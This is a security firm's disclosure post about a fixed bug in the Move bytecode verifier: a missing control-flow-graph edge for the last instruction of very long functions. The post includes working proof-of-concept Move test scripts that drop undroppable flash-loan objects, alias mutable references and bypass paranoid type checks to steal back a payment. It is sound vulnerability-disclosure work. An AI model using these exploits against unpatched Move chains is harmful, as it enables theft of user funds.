The Zellic Team

May 16, 2023

The Billion Dollar Bug: Finding and Fixing a Critical Issue in the Move Bytecode Verifier

How Zellic found and fixed a critical vulnerability that broke Move

Sometimes, you find what you’re looking for where you least expect.

Mysten Labs, the organization behind the Sui blockchain, contracted with us for a security assessment of their Layer 1 core. Specifically, we were tasked with securing Sui’s Move bytecode verifier before for their mainnet launch. The verifier is responsible for ensuring the core security properties of the Move VM are upheld. Interestingly, this verifier is shared among all Move-based blockchains, including Aptos ($2.1B market cap), Starcoin, and 0L.

Our assessment’s scope primarily focused on the bytecode verifier itself and programmable transactions. However, the bug we found was in one of the dependencies of this verifier. In providing a comprehensive review, we decided to dig into these as well — after all, a good hacker can never resist a nice rabbit hole. In the move-binary-format crate, which is shared across all Move implementations, we discovered a critical, subtle, and novel bug relating to the verification of bytecode control flow. This was the last place we would have expected to find this kind of critical flaw!

In this blog post, we disclose this critical issue. This bug places potentially billions of dollars at risk. It would allow attackers to bypass the locals safety and reference safety verifier passes of the core Move verifier, plus the Sui-specific ID leak verifier (in which we previously discovered another bug↗). We will discuss the specific attack scenarios as well. Once again, this vulnerability impacted not only Sui but also other platforms using Move, including Aptos.

Ultimately, the bug would have allowed attackers to obtain multiple mutable references to an object, retain a mutable reference to an object that was moved, and to drop an object without the drop ability. Move is a language similar to Rust, and these are violations of Move’s most fundamental security properties.

TL;DR: A subtle bug in the Move bytecode verifier allowed attackers to bypass multiple security properties, potentially leading to significant financial damages. The bug affected the construction of the control flow graph (CFG) of a function. Exploits included dropping a value without the drop ability, bypassing the reference safety verifier, and bypassing paranoid type checks. The issue was fixed, and we collaborated closely with Mysten Labs during the disclosure process.

Move language primer

If you already know about Move and want to get directly to the details of the bug, click here to skip the introduction.

The Move language and virtual machine, originally designed for the now defunct Libra Project↗, bring interesting new ideas to the space. The language somewhat resembles Rust, having a similar syntax, strong static typing, and strong ownership with a borrow checker.

Modules (smart contracts in Move lingo) can define custom data types. The contents of an instance can only be directly accessed by the code that defined the type, meaning the fields of a custom type can be trusted by default. Also by default, a module cannot copy or drop (delete) an instance of a data type defined by another module, unless the data type was defined with the copy or drop abilities.

This programming model is interestingly unique, as it allows to create data types that have properties similar to a physical object; for instance, Coin<T>, the data type used to represent a token on Move platforms, cannot be copied nor dropped, meaning it is not possible to create a Coin out of thin air nor to make a Coin vanish by mistake. As we will see, the inability to drop a value is also critical to the secure operation of flash loans. Recall that flash loans essentially provide untrusted users access to unsecured, “infinite” leverage for the duration of an atomic transaction — thus, any mistakes in the operation of a flash loan would be devastating.

For a comprehensive overview of the Move language, refer to The Move Book↗. You can also check out our two-part blog post on Move security: part 1↗ and part 2↗.

The Move verifier

Move source code is compiled to a bytecode that runs on the Move VM. The verifier’s job is to read and statically analyze bytecode to look for any loopholes that could bypass the Move security properties we discussed above. To be more technical, this means that before being published and run, the bytecode of a module is run through a set of verifier passes that ensure it does not violate any of the security properties defined in the Move programming model. The verification process is quite complex, involving a dozen verifiers, some of which are divided in smaller passes:

BoundsChecker::verify_module
LimitsVerifier::verify_module
DuplicationChecker::verify_module
SignatureChecker::verify_module
InstructionConsistency::verify_module
constants::verify_module
friends::verify_module
ability_field_requirements::verify_module
RecursiveStructDefChecker::verify_module
InstantiationLoopChecker::verify_module
CodeUnitVerifier::verify_module
- Control flow verifier
- Code unit verifier
  - Stack usage verifier
  - Type safety verifier
  - Locals safety verifier
  - Reference safety verifier
- Acquires list verifier
script_signature::verify_module

Verifier passes run on all individual functions in a module in the above order. Later verifiers only run if preceding ones found no errors. Explaining the whole verifier in all its complexity could easily fill a small book, and we certainly cannot fit all of it in this blog post.

If you want to know more about any individual pass, the source code↗ is a good reference. It contains comments on most passes, explaining what security invariants they enforce, and to the report of our audit↗. Should you find these topics fascinating, it’s also rewarding and worthwhile studying the field of static analysis↗ in general.

For this bug, we are interested in the locals safety and reference safety subpasses of the CodeUnitVerifier, since they are impacted by the issue.

Locals safety verifier

This pass ensures that operations involving local variables are safe. It prevents operations that would move, copy, or borrow an unavailable local variable. It also prevents operations that would drop a local variable value without the drop ability by overwriting it or returning from the function.

It is implemented via an abstract interpretation framework that keeps track of the availability state of the local variables. Three states are admitted: Unavailable, Available, and MaybeAvailable. These states represent the knowledge that a local variable is, respectively, definitely unavailable (e.g., the value was moved), definitely available (meaning the local variable certainly contains a value), or that it might be available but not for certain. This last, partially undetermined state is used to ensure values that might remain stored in locals at the end of a function cannot be dropped unless they have the drop ability.

Function locals are used to store both function arguments, which start in the Available state, as well as local temporary variables, which start as Unavailable. The abstract interpretation machine iterates over the control flow graph (CFG↗), emulating the effects of the instructions of every basic block to keep track of the state of the local variables. This is done until a fixed point is reached, which is guaranteed to happen due to how the transfer function is defined and the properties of the CFG enforced by the control flow verifier.

A fault in this pass could allow to use an unavailable local variable or to drop values that don’t have the drop ability.

Due to how the Move VM is currently implemented, trying to exploit the former case would likely just cause a crash. This is because at runtime, unavailable values are represented by ValueImpl::Invalid to detect faults in the verifier. A mitigation against the second consequence can be enabled with the paranoid_type_checks option of the verifier, which introduces runtime checks that ensure the overwritten value has the drop ability.

Reference safety verifier

This pass ensures usage of references is safe; in other words, it enforces the Move data ownership model. More specifically, it checks that

no mutable reference exists to a local value when it is copied
no reference exists to a local value when it is taken (overwritten or dropped) or moved
no immutable references are taken on a local value that is already mutably borrowed
reads through a reference are permissible (always the case for immutable references; mutable references can be read only if they are freezable)
writes through a reference are permissible (never the case for immutable references; mutable references can be written if there are no outstanding borrows)

Additional security properties regarding global values are also enforced. These are irrelevant for Sui, since instructions involving global storage cannot be used but are relevant to other chains, like Aptos.

The pass is implemented using an abstract interpretation↗ framework that keeps track of the outstanding mutable and immutable references while iterating on the CFG. While doing so, a graph representing the outstanding references is maintained and checked to make sure the properties described above hold.

The bug

We’re finally at the cool part. As we’ve seen, multiple verifier passes use the CFG of the function to perform abstract interpretation of the code and enforce security invariants.

The issue was located in a helper function and resulted in an incorrect construction of the CFG of a function that lacked some edges. The CFG is used by the above verifiers to ensure the code respects various security properties; the missing CFG edge allowed to have pieces of code that were effectively invisible to the verifier. Consequences of this include the ability to obtain multiple mutable references to an object, retain a mutable reference to an object that was moved, and to drop an object without the drop ability, breaking several fundamental Move security properties.

The CFG of the function is constructed by control_flow_graph.rs::VMControlFlowGraph↗. One of the first steps is to create the set of basic blocks of a function, represented as a map using the basic block ID (its entry point) as key, and containing its exit and the list of its successors as value:

pub fn new(code: &[Bytecode]) -> Self {
  // [...]
  // Create basic blocks
  let mut blocks = Map::new();
  let mut entry = 0;
  let mut exit_to_entry = Map::new();
  for pc in 0..code.len() {
      let co_pc = pc as CodeOffset;

      // Create a basic block
      if Self::is_end_of_block(co_pc, code, &block_ids) {
          let exit = co_pc;
          exit_to_entry.insert(exit, entry);
          let successors = Bytecode::get_successors(co_pc, code);
          let bb = BasicBlock { exit, successors };
          blocks.insert(entry, bb);
          entry = co_pc + 1;
      }
  }
  // [...]
}

The bug lies in the Bytecode::get_successors↗ helper function. Can you spot it?

/// Return the successor offsets of this bytecode instruction.
pub fn get_successors(pc: CodeOffset, code: &[Bytecode]) -> Vec<CodeOffset> {
    assert!(
        // The program counter must remain within the bounds of the code
        pc < u16::MAX && (pc as usize) < code.len(),
        "Program counter out of bounds"
    );

    // Return early to prevent overflow if pc is hiting the end of max number of instructions allowed (u16::MAX).
    if pc > u16::max_value() - 2 {
        return vec![];
    }

    let bytecode = &code[pc as usize];
    let mut v = vec![];

    if let Some(offset) = bytecode.offset() {
        v.push(*offset);
    }

    let next_pc = pc + 1;
    if next_pc >= code.len() as CodeOffset {
        return v;
    }

    if !bytecode.is_unconditional_branch() && !v.contains(&next_pc) {
        // avoid duplicates
        v.push(pc + 1);
    }

    // always give successors in ascending order
    if v.len() > 1 && v[0] > v[1] {
        v.swap(0, 1);
    }

    v
}

Were you able to spot it? If not, don’t worry. It is a very subtle issue and has gone unnoticed through countless code reviews.

The early return if pc > u16::max_value() - 2 is incorrect! This check was mainly added to prevent against DoS if pc is close to overflowing. But there is a more dire consequence of this early return.

It means that the very last opcode in a function with 65,534 instructions will always have no successors. If the last opcode is a jump, there is a successor, but the CFG would return none.

As a result, any verifier pass using the successor list will not see one of the edges of the CFG. In practice, this means that the verifiers using the generic abstract interpretation machinery will not analyze some of the code, ignoring its effects on the state of the system and allowing to break the security invariants they should enforce.

Exploiting the bug

Multiple attacks are possible because of this bug, very likely leading to extremely significant financial damages. For instance, a common implementation of flash loans (on Aptos, “hot potatoes”) gives the borrower an object that does not have the drop ability, which must be given back to the lender contract together with the lent funds and interests in order to correctly finish the transaction. In other words, an attacker could successfully take out a flash loan and not repay the borrowed funds!

As we will see in one of the proof of concepts that follow, the security of this system can be broken by bypassing the locals safety verifier. The POCs can be run using the Move testing framework and were developed on commit b47c1d895. All proof of concepts include a comment that specifies where padding instructions should be inserted so that the function reaches length 65,534.

Note that to run the tests on Aptos, the return padding instructions need to be replaced with nops, because of an additional check limiting the amount of basic blocks in a function, which does not prevent exploitation of this bug in any meaningful way. However, there is no convenient way to insert nops available in the pseudo-asm dialect used by the Move test framework, and there is no way to compile a textual representation of the exact bytecode either.

Locals safety verifier

This proof of concept demonstrates the ability to bypass the locals safety verifier by dropping a value that does not have the drop ability. Two instances of an object are obtained and stored in a local variable. The first instance is overwritten with the second (which would normally not be possible), and the second instance is then destroyed using an intended function. This would have allowed to break hot potato design, breaking almost all of currently implemented flash loans.

Note that dropping an object of which only one instance exists should also be possible in a similar fashion, for example by wrapping it into a vector and overwriting it with an empty vector of the same type.

//# publish --syntax=move
module 0x1::test {
    struct HotPotato {
        value: u32
    }
    public fun get_hot_potato(): HotPotato {
        HotPotato { value: 42 }
    }
    public fun destroy_hot_potato(potato: HotPotato) {
        HotPotato { value: _ } = potato;
    }
}
//# run
import 0x1.test;
main() {
    let hot_potato_1: test.HotPotato;
    let hot_potato_2: test.HotPotato;
label padding:
    jump end;
    return;
    // [LOTS OF RETURNS]
    return;
label start:
    hot_potato_1 = test.get_hot_potato();
    hot_potato_2 = test.get_hot_potato();
    hot_potato_1 = move(hot_potato_2);
    test.destroy_hot_potato(move(hot_potato_1));
    return;
label end:
    jump start;
}

Reference safety verifier bypass

This second proof of concept demonstrates the ability to bypass the reference safety verifier by invoking a hypothetical squash function that takes two mutable Coin references and moves the value of the second coin into the first. The function is instead invoked with two mutable references to the same coin:

//# publish --syntax=move
module 0x1::balance {
    struct Balance has drop {
        value: u64
    }
    public fun create_balance(value: u64): Balance {
        Balance { value }
    }
    public fun squash(balance_1: &mut Balance, balance_2: &mut Balance) {
        let balance_2_value = balance_2.value;
        balance_2.value = 0;
        balance_1.value = balance_1.value + balance_2_value;
    }
}
//# run
import 0x1.balance;
main() {
    let balance_a: balance.Balance;
label padding:
    jump end;
    return;
    // [PADDING RETURN STATEMENTS]
    return;
label start:
    balance_a = balance.create_balance(100);
    balance.squash(&mut balance_a, &mut balance_a);
    return;
label end:
    jump start;
}

Paranoid type checks

Additional runtime security checks can be enabled on the Move VM by setting the paranoid_type_checks option. The checks are quite effective at preventing most trivial exploits, resulting in a runtime VM error.

For instance, they seem to always detect when an object without the drop ability is dropped. However, they are insufficient to guard against all possible exploits, as demonstrated in our third proof of concept.

Paranoid type checks bypass

This proof of concept demonstrates how it is possible to push a mutable reference to an object and the object itself to the virtual machine stack. This allows us to pass the object to some other function while retaining a mutable reference to it. This proof of concept simulates a payment by invoking a function that takes a Balance object and then stealing back the transferred value by using the mutable reference.

The most straightforward way to obtain a reference in Move would be to store the object in a local variable and then to take a reference to it. Using this method to push both a mutable reference and the instance of the target object on the stack is not feasible due to runtime checks independent from the verifier and from the separate paranoid_type_checks.

Execution of the MoveLoc instruction to move the local variable to the stack will cause an error in values_impl.rs::swap_loc; the function checks that the reference count of the object being moved is at most one. Since taking a mutable reference increases the reference count, it not possible to move a local variable for which a reference exists.

This proof of concept shows one of the possible bypasses to this limitation. The broken state is achieved by packing the victim object in a vector, taking a reference to the object, and then pushing the object to the stack by unpacking the vector. This strategy allows to get a mutable reference to the object without it being stored directly in a local variable, bypassing the check.

//# publish --syntax=move
module 0x1::test {
    struct Balance has drop {
        value: u64
    }
    public fun balance_create(value: u64): Balance {
        Balance { value }
    }
    public fun balance_value(balance: &Balance): u64 {
        balance.value
    }
    public fun pay_debt(balance: Balance) {
        assert!(balance.value >= 100, 234);
        // Here we are dropping the balance
        // In reality it would be transferred, the payment marked as done, etc
    }
    public fun balance_split(self: &mut Balance, value: u64): Balance {
        assert!(self.value >= value, 123);
        self.value = self.value - value;
        Balance { value }
    }
}
//# run
import 0x1.test;
main() {
    let v: vector<test.Balance>;
    let bal: test.Balance;
label padding:
    jump end;
    return;
    // [padding returns]
    return;
label start:
    bal = test.balance_create(100);
    v = vec_pack_1<test.Balance>(move(bal));
    // Stack at this point: <empty>
    // Pushes a mutable reference to the balance on the stack
    vec_mut_borrow<test.Balance>(&mut v, 0);
    // Stack at this point: &mut balance
    // Pushes the balance instance by unpacking the vector
    vec_unpack_1<test.Balance>(move(v));
    // Stack at this point: &mut balance, balance
    // Pay something (implicitly using the balance on top of the stack as argument)
    test.pay_debt();
    // Stack at this point: &mut balance
    // We still have the mutable reference to the balance, let's steal from it
    (100);                          // Push 100 on the stack
    bal = test.balance_split();
    // Stack at this point: <empty>
    assert(test.balance_value(&bal) == 100, 567);
    return;
label end:
    jump start;
}

Timeline and response

We report some significant events regarding this issue. Mysten Labs contracted us to review the bytecode verifier, and we discovered this issue. It affected all the other Move language chains as well (Aptos, Starcoin, 0L). We maintained an (unofficial) internal embargo to mitigate the risk of this issue being released to the public before a patch was deployed as much as possible. However, some security researchers have noticed and publicly disclosed↗ the issue from the commit fixes.

October 6, 2022: The issue is introduced in commit 8bddbe65↗
March 25, 2023: Issue is first reported to Mysten Labs
- We are informed by Mysten Labs that they would also share the details of the issue with developers of other Move-based platforms
March 30, 2023: Commit d2bf6a3c↗ silently fixing the issue is introduced in Sui branch of Move
March 31, 2023: Aptos Node Hotfix Release v1.3.3
- This release has no release notes nor source code available; we suspect it contains the fix, but we were not informed by Aptos about it
April 10, 2023: Commit 1fa4ed20↗ explicitly fixes the issue in Aptos branch of Move
- At present (April 12), this commit was not yet included in Aptos vendored fork of Move↗

We mainly communicated with Mysten Labs to disclose this vulnerability. While we inquired about the possibility of receiving a bug bounty from Aptos for this vulnerability, they declined our request, citing the context in which the vulnerability was discovered — namely that it was discovered while performing an audit for Mysten Labs. We understand their perspective and appreciate their commitment to security.

Conclusion

The Move bytecode verifier bug, introduced on October 6th, 2022, and silently fixed on March 30th, 2023, in the Sui branch, allowed attackers to bypass multiple security properties, leading to potentially significant financial damages. The bug was subtle and resided in the Bytecode::get_successors helper function, resulting in an incorrect construction of the CFG of a function.

Proof of concepts demonstrated the possibility of dropping a value without the drop ability, bypassing the reference safety verifier and bypassing paranoid type checks. Although the paranoid type checks offered some additional protection, they were insufficient to guard against all possible exploits.

Aptos and other Move-based platforms worked to fix the issue. We look forward to continuing our productive partnership and working together to ensure the highest level of security for all stakeholders in the Move ecosystem.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

The Billion Dollar Bug: Finding and Fixing a Critical Issue in the Move Bytecode Verifier

Move language primer

The Move verifier

Locals safety verifier

Reference safety verifier

The bug

Exploiting the bug

Locals safety verifier

Reference safety verifier bypass

Paranoid type checks

Paranoid type checks bypass

Timeline and response

Conclusion

About Us

About us

What we do

Follow us

Move language primer​

The Move verifier​

Locals safety verifier​

Reference safety verifier​

The bug​

Exploiting the bug​

Locals safety verifier​

Reference safety verifier bypass​

Paranoid type checks​

Paranoid type checks bypass​

Timeline and response​

Conclusion​

About Us​

Move language primer

The Move verifier

Locals safety verifier

Reference safety verifier

The bug

Exploiting the bug

Locals safety verifier

Reference safety verifier bypass

Paranoid type checks

Paranoid type checks bypass

Timeline and response

Conclusion

About Us